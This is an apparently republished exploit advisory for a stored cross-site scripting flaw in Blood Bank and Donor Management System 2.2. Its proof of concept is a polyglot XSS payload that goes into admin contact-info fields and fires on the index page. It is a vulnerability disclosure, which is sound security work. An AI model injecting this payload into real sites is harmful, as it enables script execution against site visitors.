Home Tools Exploits & CVE's Blood Bank And Donor Management System 2.2 Cross Site Scripting

Blood Bank And Donor Management System 2.2 Cross Site Scripting

September 15, 2023

570

Authored by SoSPiro

Blood Bank and Donor Management System version 2.2 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows

#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e" payload.
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

Blood Bank And Donor Management System 2.2 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

osCommerce 4 Cross Site Scripting

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Backdoor.Win32.WinShell.30 Remote Stack Buffer Overflow / Missing Authentication

CHIYU TCP/IP Converter CRLF Injection

Sudo Heap-Based Buffer Overflow